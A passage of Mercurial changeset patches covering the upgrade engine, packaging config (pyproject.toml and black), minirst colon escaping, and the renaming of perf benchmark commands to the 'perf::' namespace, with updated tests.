- ui.status( - _( - b'marking source repository as being upgraded; clients will be ' - b'unable to read from repository\n' - ) - ) - scmutil.writereporequirements( - srcrepo, srcrepo.requirements | {b'upgradeinprogress'} - ) - - ui.status(_(b'starting in-place swap of repository data\n')) - if upgrade_op.backup_store: - ui.status(_(b'replaced files will be backed up at %s\n') % backuppath) + ui.status(_(b'starting in-place swap of repository data\n')) + if upgrade_op.backup_store: + ui.status( + _(b'replaced files will be backed up at %s\n') % backuppath + ) - # Now swap in the new store directory. Doing it as a rename should make - # the operation nearly instantaneous and atomic (at least in well-behaved - # environments). - ui.status(_(b'replacing store...\n')) - tstart = util.timer() - _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) - elapsed = util.timer() - tstart - ui.status( - _( - b'store replacement complete; repository was inconsistent for ' - b'%0.1fs\n' + # Now swap in the new store directory. Doing it as a rename should make + # the operation nearly instantaneous and atomic (at least in well-behaved + # environments). + ui.status(_(b'replacing store...\n')) + tstart = util.timer() + _replacestores(srcrepo, dstrepo, backupvfs, upgrade_op) + elapsed = util.timer() - tstart + ui.status( + _( + b'store replacement complete; repository was inconsistent for ' + b'%0.1fs\n' + ) + % elapsed ) - % elapsed - ) - # We first write the requirements file. Any new requirements will lock - # out legacy clients. - ui.status( - _( - b'finalizing requirements file and making repository readable ' - b'again\n' + # We first write the requirements file. Any new requirements will lock + # out legacy clients. 
+ ui.status( + _( + b'finalizing requirements file and making repository readable ' + b'again\n' + ) ) - ) - scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) - if upgrade_op.backup_store: - # The lock file from the old store won't be removed because nothing has a - # reference to its new location. So clean it up manually. Alternatively, we - # could update srcrepo.svfs and other variables to point to the new - # location. This is simpler. - backupvfs.unlink(b'store/lock') + if upgrade_op.backup_store: + # The lock file from the old store won't be removed because nothing has a + # reference to its new location. So clean it up manually. Alternatively, we + # could update srcrepo.svfs and other variables to point to the new + # location. This is simpler. + backupvfs.unlink(b'store/lock') + else: + pass return backuppath # HG changeset patch # User Pulkit Goyal <7895pulkit@gmail.com> # Date 1610622430 -19800 # Thu Jan 14 16:37:10 2021 +0530 # Node ID f2c4224e66483512d48997485114bf5c8a7e1080 # Parent ee9002b9959566290a263493c409fcf7406df2b3 upgrade: update only requirements if we can Upgrade operations which involves just upgrading requirements earlier used to go through whole revlog cloning business. Now we just upgrade the requirement and skip the cloning part. Differential Revision: https://phab.mercurial-scm.org/D9775 diff --git a/mercurial/upgrade_utils/engine.py b/mercurial/upgrade_utils/engine.py --- a/mercurial/upgrade_utils/engine.py +++ b/mercurial/upgrade_utils/engine.py @@ -449,7 +449,7 @@ ) ) - if True: + if not upgrade_op.requirements_only: with dstrepo.transaction(b'upgrade') as tr: _clonerevlogs( ui, @@ -533,6 +533,7 @@ # location. This is simpler. 
backupvfs.unlink(b'store/lock') else: - pass + ui.status(_(b'upgrading repository requirements\n')) + scmutil.writereporequirements(srcrepo, upgrade_op.new_requirements) return backuppath diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -371,26 +371,8 @@ repository locked and read-only creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) (it is safe to interrupt this process any time before data migration completes) - migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) - migrating 626 bytes in store; 271 bytes tracked data - migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) - finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes - migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) - finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes - migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) - finished migrating 2 changelog revisions; change in size: 0 bytes - finished migrating 6 total revisions; total change in store size: 0 bytes - copying phaseroots - data fully upgraded in a temporary repository - marking source repository as being upgraded; clients will be unable to read from repository - starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - replacing store... 
- store replacement complete; repository was inconsistent for *s (glob) - finalizing requirements file and making repository readable again + upgrading repository requirements removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) - copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository upgraded to share safe mode, existing shares will still work in old non-safe mode. Re-share existing shares to use them in safe mode New shares will be created in safe mode. $ hg debugrequirements @@ -475,27 +457,8 @@ repository locked and read-only creating temporary repository to stage upgraded data: $TESTTMP/non-share-safe/.hg/upgrade.* (glob) (it is safe to interrupt this process any time before data migration completes) - migrating 6 total revisions (2 in filelogs, 2 in manifests, 2 in changelog) - migrating 626 bytes in store; 271 bytes tracked data - migrating 2 filelogs containing 2 revisions (138 bytes in store; 8 bytes tracked data) - finished migrating 2 filelog revisions across 2 filelogs; change in size: 0 bytes - migrating 1 manifests containing 2 revisions (230 bytes in store; 135 bytes tracked data) - finished migrating 2 manifest revisions across 1 manifests; change in size: 0 bytes - migrating changelog containing 2 revisions (258 bytes in store; 128 bytes tracked data) - finished migrating 2 changelog revisions; change in size: 0 bytes - finished migrating 6 total revisions; total change in store size: 0 bytes - copying phaseroots - copying requires - data fully upgraded in a temporary repository - marking source repository as being upgraded; clients will be unable to read from repository - starting in-place swap of repository data - replaced files will be backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - replacing store... 
- store replacement complete; repository was inconsistent for *s (glob) - finalizing requirements file and making repository readable again + upgrading repository requirements removing temporary repository $TESTTMP/non-share-safe/.hg/upgrade.* (glob) - copy of old repository backed up at $TESTTMP/non-share-safe/.hg/upgradebackup.* (glob) - the old repository will not be deleted; remove it to free up disk space once the upgraded repository is verified repository downgraded to not use share safe mode, existing shares will not work and needs to be reshared. $ hg debugrequirements # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845124 18000 # Tue Dec 01 12:52:04 2020 -0500 # Node ID 45afff0f530a48b232a655ecd1af3978cef25b11 # Parent f2c4224e66483512d48997485114bf5c8a7e1080 pyproject: add config file This will tell pip et al to call our setup.py for the majority of packaging concerns, but also gives us a place to put standard config stuff like black. Differential Revision: https://phab.mercurial-scm.org/D9833 diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,3 @@ +[build-system] +requires = ["setuptools", "wheel"] +build-backend = "setuptools.build_meta" diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -70,6 +70,7 @@ hg hgeditor hgweb.cgi + pyproject.toml rustfmt.toml setup.py # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845573 18000 # Tue Dec 01 12:59:33 2020 -0500 # Node ID d4c8b4b90ecb9df37b64569f89a8921c1083ac54 # Parent 45afff0f530a48b232a655ecd1af3978cef25b11 black: merge config into main pyproject.toml now that we have it This means that naive contributors who just run `black` on a source file will get reasonable behavior as long as they have a recent black. Yay! 
Differential Revision: https://phab.mercurial-scm.org/D9834 diff --git a/black.toml b/black.toml deleted file mode 100644 --- a/black.toml +++ /dev/null @@ -1,14 +0,0 @@ -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black --config=black.toml - +black:command = black black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/pyproject.toml b/pyproject.toml --- a/pyproject.toml +++ b/pyproject.toml @@ -1,3 +1,18 @@ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" + +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -66,7 +66,6 @@ COPYING Makefile README.rst - black.toml hg hgeditor hgweb.cgi diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,5 @@ #require black test-repo $ cd $RUNTESTDIR/.. 
- $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611588883 -3600 # Mon Jan 25 16:34:43 2021 +0100 # Node ID 374d7fff7cb5dc0e291e59d469aeb1c5f24a7639 # Parent d4c8b4b90ecb9df37b64569f89a8921c1083ac54 store: use `endswith` to detect revlog extension Suggested by Gregory Szorc. Differential Revision: https://phab.mercurial-scm.org/D9865 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -387,13 +387,13 @@ b'requires', ] +REVLOG_FILES_EXT = (b'.i', b'.d', b'.n', b'.nd') + def isrevlog(f, kind, st): if kind != stat.S_IFREG: return False - if f[-2:] in (b'.i', b'.d', b'.n'): - return True - return f[-3:] == b'.nd' + return f.endswith(REVLOG_FILES_EXT) class basicstore(object): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611618340 -3600 # Tue Jan 26 00:45:40 2021 +0100 # Node ID 7bb31c367847f1f1e1331b91633cee4a31025c1a # Parent 374d7fff7cb5dc0e291e59d469aeb1c5f24a7639 run-test: avoid byte issue when replacing output file of python test Otherwise we get error like:: FileNotFoundError: [Errno 2] No such file or directory: "b'…/tests/test-minirst.py'.out" Differential Revision: https://phab.mercurial-scm.org/D9868 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -2278,7 +2278,7 @@ if test.path.endswith(b'.t'): rename(test.errpath, test.path) else: - rename(test.errpath, '%s.out' % test.path) + rename(test.errpath, b'%s.out' % test.path) accepted = True if not accepted: self.faildata[test.name] = b''.join(lines) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611612476 -3600 # Mon Jan 25 23:07:56 2021 +0100 # Node ID 
aaff3bc753064c9cddf9037406d9b835d0d633c5 # Parent 7bb31c367847f1f1e1331b91633cee4a31025c1a minirst: respect escaping in definition list key If we start adding `:` in command names… we need minirst to not choke on them. Differential Revision: https://phab.mercurial-scm.org/D9869 diff --git a/mercurial/minirst.py b/mercurial/minirst.py --- a/mercurial/minirst.py +++ b/mercurial/minirst.py @@ -158,7 +158,7 @@ _optionre = re.compile( br'^(-([a-zA-Z0-9]), )?(--[a-z0-9-]+)' br'((.*) +)(.*)$' ) -_fieldre = re.compile(br':(?![: ])([^:]*)(?<! ):[ ]+(.*)') +_fieldre = re.compile(br':(?![: ])((?:\:|[^:])*)(?<! ):[ ]+(.*)') _definitionre = re.compile(br'[^ ]') _tablere = re.compile(br'(=+\s+)*=+') @@ -229,7 +229,7 @@ m = _fieldre.match(blocks[j][b'lines'][0]) key, rest = m.groups() blocks[j][b'lines'][0] = rest - blocks[j][b'key'] = key + blocks[j][b'key'] = key.replace(br'\:', b':') j += 1 i = j + 1 diff --git a/tests/test-minirst.py b/tests/test-minirst.py --- a/tests/test-minirst.py +++ b/tests/test-minirst.py @@ -159,6 +159,8 @@ :a: First item. :ab: Second item. Indentation and wrapping is handled automatically. +:c\:d: a key with colon +:efg\:\:hh: a key with many colon Next list: diff --git a/tests/test-minirst.py.out b/tests/test-minirst.py.out --- a/tests/test-minirst.py.out +++ b/tests/test-minirst.py.out @@ -439,6 +439,8 @@ a First item. ab Second item. Indentation and wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many colon Next list: @@ -456,6 +458,9 @@ wrapping is handled automatically. +c:d a key with colon +efg::hh a key with many + colon Next list: @@ -476,6 +481,10 @@ <dd>First item. <dt>ab <dd>Second item. Indentation and wrapping is handled automatically. 
+ <dt>c:d + <dd>a key with colon + <dt>efg::hh + <dd>a key with many colon </dl> <p> Next list: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611612513 -3600 # Mon Jan 25 23:08:33 2021 +0100 # Node ID d481f30ea8e392b1d4db7d00ef023815335db132 # Parent aaff3bc753064c9cddf9037406d9b835d0d633c5 help: escape ':' (as '\:') when generating command names We need this before we can use ":" in command names. Differential Revision: https://phab.mercurial-scm.org/D9870 diff --git a/mercurial/help.py b/mercurial/help.py --- a/mercurial/help.py +++ b/mercurial/help.py @@ -829,10 +829,11 @@ def appendcmds(cmds): cmds = sorted(cmds) for c in cmds: + display_cmd = c if ui.verbose: - rst.append(b" :%s: %s\n" % (b', '.join(syns[c]), h[c])) - else: - rst.append(b' :%s: %s\n' % (c, h[c])) + display_cmd = b', '.join(syns[c]) + display_cmd = display_cmd.replace(b':', br'\:') + rst.append(b' :%s: %s\n' % (display_cmd, h[c])) if name in (b'shortlist', b'debug'): # List without categories. # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611612781 -3600 # Mon Jan 25 23:13:01 2021 +0100 # Node ID c41ac8985fe47c79604243eeff4a673671112109 # Parent d481f30ea8e392b1d4db7d00ef023815335db132 perf: test the formatting of a command help Since we are about to add ':' in command names, I want this covered.
Differential Revision: https://phab.mercurial-scm.org/D9871 diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -195,6 +195,20 @@ perf--write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) + + $ hg help perfaddremove + hg perf--addremove + + aliases: perfaddremove + + (no help text available) + + options: + + -T --template TEMPLATE display with template + + (some details hidden, use --verbose to show complete help) + $ hg perfaddremove $ hg perfancestors $ hg perfancestorset 2 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611589611 -3600 # Mon Jan 25 16:46:51 2021 +0100 # Node ID d8ad391e10f501c817ae80a88050a7cb78a1e782 # Parent c41ac8985fe47c79604243eeff4a673671112109 command-namespace: use `::` as the command separator This was discussed on the mailing list / phab and `::` got a couple of positive feedback. I decided to not introduce automatic folding of `::`, I feel like it makes sense for `-`, but I like the explicitness of `::`. So I am adding aliases for backward compatibility.
Differential Revision: https://phab.mercurial-scm.org/D9872 diff --git a/contrib/perf.py b/contrib/perf.py --- a/contrib/perf.py +++ b/contrib/perf.py @@ -744,7 +744,7 @@ # perf commands -@command(b'perf--walk', formatteropts) +@command(b'perf::walk|perfwalk', formatteropts) def perfwalk(ui, repo, *pats, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -759,7 +759,7 @@ fm.end() -@command(b'perf--annotate', formatteropts) +@command(b'perf::annotate|perfannotate', formatteropts) def perfannotate(ui, repo, f, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -769,7 +769,7 @@ @command( - b'perf--status', + b'perf::status|perfstatus', [ (b'u', b'unknown', False, b'ask status to look for unknown files'), (b'', b'dirstate', False, b'benchmark the internal dirstate call'), @@ -806,7 +806,7 @@ fm.end() -@command(b'perf--addremove', formatteropts) +@command(b'perf::addremove|perfaddremove', formatteropts) def perfaddremove(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -837,7 +837,7 @@ cl._nodepos = None -@command(b'perf--heads', formatteropts) +@command(b'perf::heads|perfheads', formatteropts) def perfheads(ui, repo, **opts): """benchmark the computation of a changelog heads""" opts = _byteskwargs(opts) @@ -855,7 +855,7 @@ @command( - b'perf--tags', + b'perf::tags|perftags', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -880,7 +880,7 @@ fm.end() -@command(b'perf--ancestors', formatteropts) +@command(b'perf::ancestors|perfancestors', formatteropts) def perfancestors(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -894,7 +894,7 @@ fm.end() -@command(b'perf--ancestorset', formatteropts) +@command(b'perf::ancestorset|perfancestorset', formatteropts) def perfancestorset(ui, repo, revset, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -910,7 +910,7 @@ fm.end() -@command(b'perf--discovery', formatteropts, b'PATH') 
+@command(b'perf::discovery|perfdiscovery', formatteropts, b'PATH') def perfdiscovery(ui, repo, path, **opts): """benchmark discovery between local repo and the peer at given path""" repos = [repo, None] @@ -928,7 +928,7 @@ @command( - b'perf--bookmarks', + b'perf::bookmarks|perfbookmarks', formatteropts + [ (b'', b'clear-revlogs', False, b'refresh changelog and manifest'), @@ -953,7 +953,7 @@ fm.end() -@command(b'perf--bundleread', formatteropts, b'BUNDLE') +@command(b'perf::bundleread|perfbundleread', formatteropts, b'BUNDLE') def perfbundleread(ui, repo, bundlepath, **opts): """Benchmark reading of bundle files. @@ -1080,7 +1080,7 @@ @command( - b'perf--changegroupchangelog', + b'perf::changegroupchangelog|perfchangegroupchangelog', formatteropts + [ (b'', b'cgversion', b'02', b'changegroup version'), @@ -1116,7 +1116,7 @@ fm.end() -@command(b'perf--dirs', formatteropts) +@command(b'perf::dirs|perfdirs', formatteropts) def perfdirs(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1132,7 +1132,7 @@ @command( - b'perf--dirstate', + b'perf::dirstate|perfdirstate', [ ( b'', @@ -1195,7 +1195,7 @@ fm.end() -@command(b'perf--dirstatedirs', formatteropts) +@command(b'perf::dirstatedirs|perfdirstatedirs', formatteropts) def perfdirstatedirs(ui, repo, **opts): """benchmap a 'dirstate.hasdir' call from an empty `dirs` cache""" opts = _byteskwargs(opts) @@ -1212,7 +1212,7 @@ fm.end() -@command(b'perf--dirstatefoldmap', formatteropts) +@command(b'perf::dirstatefoldmap|perfdirstatefoldmap', formatteropts) def perfdirstatefoldmap(ui, repo, **opts): """benchmap a `dirstate._map.filefoldmap.get()` request @@ -1233,7 +1233,7 @@ fm.end() -@command(b'perf--dirfoldmap', formatteropts) +@command(b'perf::dirfoldmap|perfdirfoldmap', formatteropts) def perfdirfoldmap(ui, repo, **opts): """benchmap a `dirstate._map.dirfoldmap.get()` request @@ -1255,7 +1255,7 @@ fm.end() -@command(b'perf--dirstatewrite', formatteropts) 
+@command(b'perf::dirstatewrite|perfdirstatewrite', formatteropts) def perfdirstatewrite(ui, repo, **opts): """benchmap the time it take to write a dirstate on disk""" opts = _byteskwargs(opts) @@ -1297,7 +1297,7 @@ @command( - b'perf--mergecalculate', + b'perf::mergecalculate|perfmergecalculate', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1330,7 +1330,7 @@ @command( - b'perf--mergecopies', + b'perf::mergecopies|perfmergecopies', [ (b'r', b'rev', b'.', b'rev to merge against'), (b'', b'from', b'', b'rev to merge from'), @@ -1353,7 +1353,7 @@ fm.end() -@command(b'perf--pathcopies', [], b"REV REV") +@command(b'perf::pathcopies|perfpathcopies', [], b"REV REV") def perfpathcopies(ui, repo, rev1, rev2, **opts): """benchmark the copy tracing logic""" opts = _byteskwargs(opts) @@ -1369,7 +1369,7 @@ @command( - b'perf--phases', + b'perf::phases|perfphases', [ (b'', b'full', False, b'include file reading time too'), ], @@ -1394,7 +1394,7 @@ fm.end() -@command(b'perf--phasesremote', [], b"[DEST]") +@command(b'perf::phasesremote|perfphasesremote', [], b"[DEST]") def perfphasesremote(ui, repo, dest=None, **opts): """benchmark time needed to analyse phases of the remote server""" from mercurial.node import bin @@ -1455,7 +1455,7 @@ @command( - b'perf--manifest', + b'perf::manifest|perfmanifest', [ (b'm', b'manifest-rev', False, b'Look up a manifest node revision'), (b'', b'clear-disk', False, b'clear on-disk caches too'), @@ -1499,7 +1499,7 @@ fm.end() -@command(b'perf--changeset', formatteropts) +@command(b'perf::changeset|perfchangeset', formatteropts) def perfchangeset(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1513,7 +1513,7 @@ fm.end() -@command(b'perf--ignore', formatteropts) +@command(b'perf::ignore|perfignore', formatteropts) def perfignore(ui, repo, **opts): """benchmark operation related to computing ignore""" opts = _byteskwargs(opts) @@ -1532,7 +1532,7 @@ @command( - 
b'perf--index', + b'perf::index|perfindex', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'no-lookup', None, b'do not revision lookup post creation'), @@ -1596,7 +1596,7 @@ @command( - b'perf--nodemap', + b'perf::nodemap|perfnodemap', [ (b'', b'rev', [], b'revision to be looked up (default tip)'), (b'', b'clear-caches', True, b'clear revlog cache between calls'), @@ -1667,7 +1667,7 @@ fm.end() -@command(b'perf--startup', formatteropts) +@command(b'perf::startup|perfstartup', formatteropts) def perfstartup(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1685,7 +1685,7 @@ fm.end() -@command(b'perf--parents', formatteropts) +@command(b'perf::parents|perfparents', formatteropts) def perfparents(ui, repo, **opts): """benchmark the time necessary to fetch one changeset's parents. @@ -1712,7 +1712,7 @@ fm.end() -@command(b'perf--ctxfiles', formatteropts) +@command(b'perf::ctxfiles|perfctxfiles', formatteropts) def perfctxfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1725,7 +1725,7 @@ fm.end() -@command(b'perf--rawfiles', formatteropts) +@command(b'perf::rawfiles|perfrawfiles', formatteropts) def perfrawfiles(ui, repo, x, **opts): opts = _byteskwargs(opts) x = int(x) @@ -1739,7 +1739,7 @@ fm.end() -@command(b'perf--lookup', formatteropts) +@command(b'perf::lookup|perflookup', formatteropts) def perflookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1748,7 +1748,7 @@ @command( - b'perf--linelogedits', + b'perf::linelogedits|perflinelogedits', [ (b'n', b'edits', 10000, b'number of edits'), (b'', b'max-hunk-lines', 10, b'max lines in a hunk'), @@ -1786,7 +1786,7 @@ fm.end() -@command(b'perf--revrange', formatteropts) +@command(b'perf::revrange|perfrevrange', formatteropts) def perfrevrange(ui, repo, *specs, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1795,7 +1795,7 @@ fm.end() -@command(b'perf--nodelookup', formatteropts) 
+@command(b'perf::nodelookup|perfnodelookup', formatteropts) def perfnodelookup(ui, repo, rev, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -1814,7 +1814,7 @@ @command( - b'perf--log', + b'perf::log|perflog', [(b'', b'rename', False, b'ask log to follow renames')] + formatteropts, ) def perflog(ui, repo, rev=None, **opts): @@ -1832,7 +1832,7 @@ fm.end() -@command(b'perf--moonwalk', formatteropts) +@command(b'perf::moonwalk|perfmoonwalk', formatteropts) def perfmoonwalk(ui, repo, **opts): """benchmark walking the changelog backwards @@ -1851,7 +1851,7 @@ @command( - b'perf--templating', + b'perf::templating|perftemplating', [ (b'r', b'rev', [], b'revisions to run the template on'), ] @@ -1941,7 +1941,7 @@ @command( - b'perf--helper-mergecopies', + b'perf::helper-mergecopies|perfhelper-mergecopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2124,7 +2124,7 @@ @command( - b'perf--helper-pathcopies', + b'perf::helper-pathcopies|perfhelper-pathcopies', formatteropts + [ (b'r', b'revs', [], b'restrict search to these revisions'), @@ -2263,7 +2263,7 @@ _displaystats(ui, opts, entries, alldata) -@command(b'perf--cca', formatteropts) +@command(b'perf::cca|perfcca', formatteropts) def perfcca(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2271,7 +2271,7 @@ fm.end() -@command(b'perf--fncacheload', formatteropts) +@command(b'perf::fncacheload|perffncacheload', formatteropts) def perffncacheload(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2284,7 +2284,7 @@ fm.end() -@command(b'perf--fncachewrite', formatteropts) +@command(b'perf::fncachewrite|perffncachewrite', formatteropts) def perffncachewrite(ui, repo, **opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2304,7 +2304,7 @@ fm.end() -@command(b'perf--fncacheencode', formatteropts) +@command(b'perf::fncacheencode|perffncacheencode', formatteropts) def perffncacheencode(ui, repo, 
**opts): opts = _byteskwargs(opts) timer, fm = gettimer(ui, opts) @@ -2348,7 +2348,7 @@ @command( - b'perf--bdiff', + b'perf::bdiff|perfbdiff', revlogopts + formatteropts + [ @@ -2464,7 +2464,7 @@ @command( - b'perf--unidiff', + b'perf::unidiff|perfunidiff', revlogopts + formatteropts + [ @@ -2543,7 +2543,7 @@ fm.end() -@command(b'perf--diffwd', formatteropts) +@command(b'perf::diffwd|perfdiffwd', formatteropts) def perfdiffwd(ui, repo, **opts): """Profile diff of working directory changes""" opts = _byteskwargs(opts) @@ -2568,7 +2568,11 @@ fm.end() -@command(b'perf--revlogindex', revlogopts + formatteropts, b'-c|-m|FILE') +@command( + b'perf::revlogindex|perfrevlogindex', + revlogopts + formatteropts, + b'-c|-m|FILE', +) def perfrevlogindex(ui, repo, file_=None, **opts): """Benchmark operations against a revlog index. @@ -2704,7 +2708,7 @@ @command( - b'perf--revlogrevisions', + b'perf::revlogrevisions|perfrevlogrevisions', revlogopts + formatteropts + [ @@ -2754,7 +2758,7 @@ @command( - b'perf--revlogwrite', + b'perf::revlogwrite|perfrevlogwrite', revlogopts + formatteropts + [ @@ -3047,7 +3051,7 @@ @command( - b'perf--revlogchunks', + b'perf::revlogchunks|perfrevlogchunks', revlogopts + formatteropts + [ @@ -3176,7 +3180,7 @@ @command( - b'perf--revlogrevision', + b'perf::revlogrevision|perfrevlogrevision', revlogopts + formatteropts + [(b'', b'cache', False, b'use caches instead of clearing')], @@ -3319,7 +3323,7 @@ @command( - b'perf--revset', + b'perf::revset|perfrevset', [ (b'C', b'clear', False, b'clear volatile cache between each call.'), (b'', b'contexts', False, b'obtain changectx for each revision'), @@ -3352,7 +3356,7 @@ @command( - b'perf--volatilesets', + b'perf::volatilesets|perfvolatilesets', [ (b'', b'clear-obsstore', False, b'drop obsstore between each call.'), ] @@ -3401,7 +3405,7 @@ @command( - b'perf--branchmap', + b'perf::branchmap|perfbranchmap', [ (b'f', b'full', False, b'Includes build time of subset'), ( @@ -3492,7 +3496,7 @@ @command( - 
b'perf--branchmapupdate', + b'perf::branchmapupdate|perfbranchmapupdate', [ (b'', b'base', [], b'subset of revision to start from'), (b'', b'target', [], b'subset of revision to end with'), @@ -3602,7 +3606,7 @@ @command( - b'perf--branchmapload', + b'perf::branchmapload|perfbranchmapload', [ (b'f', b'filter', b'', b'Specify repoview filter'), (b'', b'list', False, b'List brachmap filter caches'), @@ -3661,7 +3665,7 @@ fm.end() -@command(b'perf--loadmarkers') +@command(b'perf::loadmarkers|perfloadmarkers') def perfloadmarkers(ui, repo): """benchmark the time to parse the on-disk markers for a repo @@ -3673,7 +3677,7 @@ @command( - b'perf--lrucachedict', + b'perf::lrucachedict|perflrucachedict', formatteropts + [ (b'', b'costlimit', 0, b'maximum total cost of items in cache'), @@ -3829,7 +3833,7 @@ @command( - b'perf--write', + b'perf::write|perfwrite', formatteropts + [ (b'', b'write-method', b'write', b'ui write method'), @@ -3892,7 +3896,7 @@ @command( - b'perf--progress', + b'perf::progress|perfprogress', formatteropts + [ (b'', b'topic', b'topic', b'topic for progress messages'), diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -78,126 +78,126 @@ list of commands: - perf--addremove + perf::addremove (no help text available) - perf--ancestors + perf::ancestors (no help text available) - perf--ancestorset + perf::ancestorset (no help text available) - perf--annotate + perf::annotate (no help text available) - perf--bdiff benchmark a bdiff between revisions - perf--bookmarks + perf::bdiff benchmark a bdiff between revisions + perf::bookmarks benchmark parsing bookmarks from disk to memory - perf--branchmap + perf::branchmap benchmark the update of a branchmap - perf--branchmapload + perf::branchmapload benchmark reading the branchmap - perf--branchmapupdate + perf::branchmapupdate benchmark branchmap update from for <base> revs to <target> revs - perf--bundleread + 
perf::bundleread Benchmark reading of bundle files. - perf--cca (no help text available) - perf--changegroupchangelog + perf::cca (no help text available) + perf::changegroupchangelog Benchmark producing a changelog group for a changegroup. - perf--changeset + perf::changeset (no help text available) - perf--ctxfiles + perf::ctxfiles (no help text available) - perf--diffwd Profile diff of working directory changes - perf--dirfoldmap + perf::diffwd Profile diff of working directory changes + perf::dirfoldmap benchmap a 'dirstate._map.dirfoldmap.get()' request - perf--dirs (no help text available) - perf--dirstate + perf::dirs (no help text available) + perf::dirstate benchmap the time of various distate operations - perf--dirstatedirs + perf::dirstatedirs benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache - perf--dirstatefoldmap + perf::dirstatefoldmap benchmap a 'dirstate._map.filefoldmap.get()' request - perf--dirstatewrite + perf::dirstatewrite benchmap the time it take to write a dirstate on disk - perf--discovery + perf::discovery benchmark discovery between local repo and the peer at given path - perf--fncacheencode + perf::fncacheencode (no help text available) - perf--fncacheload + perf::fncacheload (no help text available) - perf--fncachewrite + perf::fncachewrite (no help text available) - perf--heads benchmark the computation of a changelog heads - 